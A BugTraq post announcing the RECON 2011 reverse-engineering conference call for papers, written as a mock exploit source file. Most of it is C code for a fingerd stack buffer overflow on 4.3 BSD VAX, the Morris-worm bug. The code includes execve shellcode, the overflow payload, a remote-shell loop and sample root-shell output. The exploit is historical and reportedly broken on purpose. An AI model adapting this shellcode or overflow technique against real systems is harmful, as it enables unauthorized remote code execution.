BugTraq
RECON 2011 CFP Mar 07 2011 02:20PM
hfortier recon cx
/*
+ + + +
+ + +
+ +
\ /
+ _ - _+_ - ,__
_=. .:. /=\ _|===|_ ||::|
| | _|. | | | | | | __===_ -=- ||::|
|==| | | __ |.:.| /\| |:. | | | | .|| : |||::|
| |- |.:|_|. :__ |.: |--|==| | .| |_ | ' |. ||. |||:.|
__|. | |_|. | |.|...||---| |==| | | | |_--. || |||. |
| | | |. | | |::.||: .| |==| | . : |=|===| :|| . ||| .|
|:.| .| | | | |:.:|| . | |==| | |=|===| . |' | | |
| | | | |' : . | ; ; ' |
' : ` : ' . ' . . :
' . R E C O N 2 0 1 1 .
` . . '
. C F P

0000000 REC0N 2011 (http://recon.cx)
0000020 JULY 8-10
0000040 HYATT REGENCY (New venue)
0000060 M0NTREAL
0000100
0000120 + REC0N 2011
0000140 - Conference and training
0000160 - No censorship, no sales pitches
0000200 - Videos from 2010 are coming online
0000220
0000240 + Now accepting submissions
0000260 - Single track
0000300 - 60 & 30 minute time slots
0000320 - Lightning talks at the party
0000340
0000360 + Primary topics
0000400 - Reverse engineering and/or exploitation:
0000420 + Software
0000440 - Malware
0000460 - Protection/DRM
0000500 - Anti-reversing
0000520 - Static/runtime analysis
0000540 + Hardware
0000560 - Embedded devices, consoles, femtocell
0000600 - Cellphones
0000620 - RFID, SDR (software defined radio)
0000640 - Side channel attacks
0000660 - Physical security (cameras, access control)
0000700 + Protocol
0000720 - GSM / CDMA
0000740
0000760 + Also of interest to us
0001000 - Privacy
0001020 + Anti-censorship
0001040 + Anti-surveillance
0001060 + Anonymity
0001100 + Counter-forensics
0001120
0001140 + Anything else elite
0001160
0001200 + Please include
0001220 - Short summary
0001240 - Name or alias
0001260 - Contact information
0001300 - Bio
0001320
0001340 + Important dates
0001360 - Training/conference registration opens March 20, 2011
0001400 - First round of selections: April 10, 2011
0001420 - CFP closes May 15, 2011
0001440
0001460 + Send submissions to
0001500 - cfp2011 @ recon.cx
0001520
0001540 + Speaker / attendee privacy
0001560 - Recon does not require speakers use their real names
0001600 - Recon does not provide attendee or speaker information to third-parties
0001620 (except where necessary for registration/payment)

* w0rd, n0w ph0r th3 g00dz..
* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC]
*
* dr0pv4x.c
* t0p-s3kR1t w4r3z k0m1n' @ ya
* str8 fr0m the k0d3l1n3
* -th3 phr3zh pr1nc3 0f b3llk0r3

* w8, b4 i ph0rg3t, 3t3rn4l sh0utz 2:

route/daemon9, sw_r, Phiber Optik, Mendax, The Last Stage of Delirium (sup guys), 8lgm,
klog[ADM], luvz2chat, netl1nk, l0r3nz0, dmk, root (at) vax.recon (dot) cx [email concealed] (lol), SN, Fravia, Mammon_,
m1x, madruquz, xmux, the current maintainer of the sexchart, so1o*, newsham, lcamtuf, Ilfak,
archive.org, m4tr1x, u4ea, Acid Phreak, ACiD BuRN, Bi-Curious George, hypatia, tdz, Lady Gaga,
Lindsay Lohan, gov-boi, jennicide, netw1z, Johnny Lee Miller, pluvius, rtm, das_modem, imm,
w1z4rd, l0renz, Subgraph & The Future Crew

* a1ght, s0 ch3k1t, jU$t f0ll0w th3z3 E-Z st3pz

* st3p 1: c0mp1l3

* st3p 2: cl0z3 uR 3y3z & r3c1t3 th3 ph0ll0w1ng s4kr3d m4ntr4

OLD WAREZ = NO WAREZ ;)

* st3p 3: ./dr0pv4x [target] offset

+ pr3st0 +

$ ./dropvax X.X.X.X -12345
[+] ATDT X.X.X.X
[+] CONNECT 9600
[+] Return address: 0xUWISH
[*] Compiled for little-endian arch.
[+] Sent payload...
[+] Shell!
4.3 BSD UNIX #3: Sat Feb 14 20:31:03 PST 2004
16:56 up 6:08, 1 user, load average: 0.09, 0.06, 0.03
User tty from login@ idle JCPU PCPU what
root co 10:49 1 -sh -if
whoami:
root
Warning: no access to tty; thus no job control in this shell...
# exit

k p8ce 0ut,
- dj j4zzy 3fn3t & th3 phr3zh pr1nc3 0f b3llk0r3

Responsible Disclosure:

++w3 h4v3 p3r$0n4lly br0k3n th1$ expl01t 1n a w4y th4t 1z m0r3-th4n-s1mpl3 t0
f1x (1 br0k3n l1n3) w1th th3 1nph0rm4t10n pr0v1d3d 1n th3 k0MM3ntz++

* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC] *
(research purposes only!!!)
*/

#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <errno.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef BIG_ENDIAN_ARCH

#define bswap(value) (((u32) (value)) << 24 | (((u32) (value)) & 0x0000FF00) << 8 | (((u32) (value)) & 0x00FF0000) >> 8 | ((u32) (value)) >> 24)

#else

#define bswap(value) (value)

#endif

extern int errno;

int try_finger(char *, int);
void fdsh(int);

uint32_t typedef u32;


#ifndef USE_ALTERNATE_SHELLCODE /* VAX-11 shellcode w/ explanation */

/* execve("/bin/sh", NULL, NULL) -
Take advantage of the 4.3 BSD UNIX VM.
It always puts the process entry point (_start) at address 0x00000000.
This gives us valid memory (a zero-byte string, since the first two bytes
of procedures like _start on VAX (those called with "callg" instr.) are
the saved register-mask, and in _start's case this is zero (does not matter).
Furthermore, this line in kern_exec.c checks if:

if (ap == NULL && uap->envp) {
uap->argp = NULL;
...
}

So we don't need a valid argv at address zero.
See the VAX Architecture Reference Manual (VARM) or the
VAX Arcitecture Handbook.

http://www.bitsavers.org/pdf/dec/vax/archSpec has a copy
of the internal version of the VARM,
which will help explain the stack frame and the instruction set.
*/

unsigned char shellcode[] =
"\021\017" /* brb shellcode+0x11 (PC-relative) */
"\272\001" /* popr $0x1 (this is a mask: pop one word into r0) */
"\335\000\335\000" /* pushl $0 ; pushl $0 */
"\335P" /* pushl %r0 (address of /bin/sh string) */
"\335\003" /* pushl $0x3 */
"\320^\\" /* movl %sp, %ap */
"\274;" /* chmk $0x3b (change mode to kernel, 0x3b = execve) */
"\026\357\353" /* jsb shellcode+0x4 (PC-relative) */
"\377\377\377"
"/bin/sh"; /* .asciz "/bin/sh" */

#else /* USE_ALTERNATE_SHELLCODE */ /* RTMorris Internet Worm (1988) */

/* If you think the shellcode is the problem, try this one. */

u32 shellcode[] =
{
bswap(0x732f8fdd),
bswap(0x8fdd0068),
bswap(0x6e69622f),
bswap(0xdd5a5ed0),
bswap(0xdd00dd00),
bswap(0xd003dd5a),
bswap(0x3bbc5c5e)
};

#endif


#define Send(str) send(sock, (str), strlen(str), 0)

void fdsh(int sock)
{
printf("[+] Sent payload...\n");

sleep(1);
Send("echo '[+] Shell!'; PATH=$PATH:/etc:/bin:/usr/bin:/usr/ucb:/usr/new:/usr/old\n");
Send("export PATH\n");
Send("strings /vmunix | fgrep UNIX\n");
Send("w ; echo whoami: ; whoami; exec csh -if\n");

for (;;) {
fd_set fds;
char buf[2048];
int nb;

FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
if (select(sock + 1, &fds, NULL, NULL, NULL) < 0) {
perror("select");
return;
}
if (FD_ISSET(0, &fds)) {
nb = read(0, buf, sizeof(buf));
if (nb <= 0) {
perror("read(2)");
return;
}
send(sock, buf, nb, 0);
}
if (FD_ISSET(sock, &fds)) {
nb = read(sock, buf, sizeof(buf));
if (nb <= 0) {
perror("read(2)");
return;
}
write(1, buf, nb);
}
}
}

/* This routine exploits a fixed 512 byte input buffer in a VAX running
* the BSD 4.3 fingerd binary. It send 536 bytes (plus a newline) to
* overwrite six extra words in the stack frame, including the return
* PC, to point into the middle of the string sent over. The instructions
* in the string do the direct system call version of execve("/bin/sh"). */

/* From sp4f ^^^^^^^ (lolololol) */

/*
* Here's what the VAX-11 stack frame looks like (from 4.3 BSD's <vax/frame.h>:
*/
#if 0
struct frame {
int fr_handler;
u_int fr_psw:16, /* saved psw */
fr_mask:12, /* register save mask */
:1,
fr_s:1, /* call was a calls, not callg */
fr_spa:2; /* stack pointer alignment */
int fr_savap; /* saved arg pointer */
int fr_savfp; /* saved frame pointer */
int fr_savpc; /* saved program counter */
};
#endif

int try_finger(char *host, int offset)
{
int s, i;
struct sockaddr_in sin = { 0 };
u32 retaddr = 0x7fffe8a8 - offset;
char buf[536];

sin.sin_family = PF_INET;
sin.sin_port = htons(79);
sin.sin_addr.s_addr = inet_addr(host);

if (sin.sin_addr.s_addr == -1) {
struct hostent *h;
h = gethostbyname(host);
if (h == NULL) {
herror("gethostbyname(3)");
return -1;
}
bcopy(h->h_addr, &sin.sin_addr, sizeof(u32));
}

if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
perror("socket(2)");
return -1;
}

printf("[+] ATDT %s\n", inet_ntoa(sin.sin_addr));

if (connect(s, (void *)&sin, sizeof(sin)) < 0){
perror("connect(2)");
printf("[-] NO DIALTONE\n");
return -1;
}

printf("[+] CONNECT 9600\n");

for (i = 0; i < 400; i++)
buf[i] = '\001'; /* VAX-11 NOP */

bcopy(shellcode, buf + 400, sizeof(shellcode));

for (i = 400 + sizeof(shellcode); i < sizeof(buf); i++)
buf[i] = '\0'; /* VAX-11 HALT, try not to land on one. */

printf("[+] Return address: %#x\n", retaddr);

#ifdef BIG_ENDIAN_ARCH
printf("[*] Compiled for big-endian arch.\n");
#else
printf("[*] Compiled for little-endian arch.\n");
#endif

*((u32 *)buf + 128) = bswap(0x7fffeab0);
*((u32 *)buf + 129) = bswap(0x7fffeb60);
*((u32 *)buf + 130) = bswap(0x20000000);
*((u32 *)buf + 131) = bswap(0x7fffeb64);
*((u32 *)buf + 132) = bswap(retaddr);
*((u32 *)buf + 133) = 0;

send(s, buf, sizeof(buf), 0); /* sizeof (buf) == 536 */
send(s, "\n", 1, 0);

fdsh(s);
printf("[-] NO CARRIER\n");
return 0;
}

main(int c, char **v)
{
char *host = v[1], *ofs = v[2];

if (!*(++v)) {
fprintf(stderr, "usage: %s hostname [offset]\n", *(--v));
exit(1);
}

if (c > 2)
try_finger(host, atoi(ofs));
else
try_finger(host, 0);

exit(0);
}

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus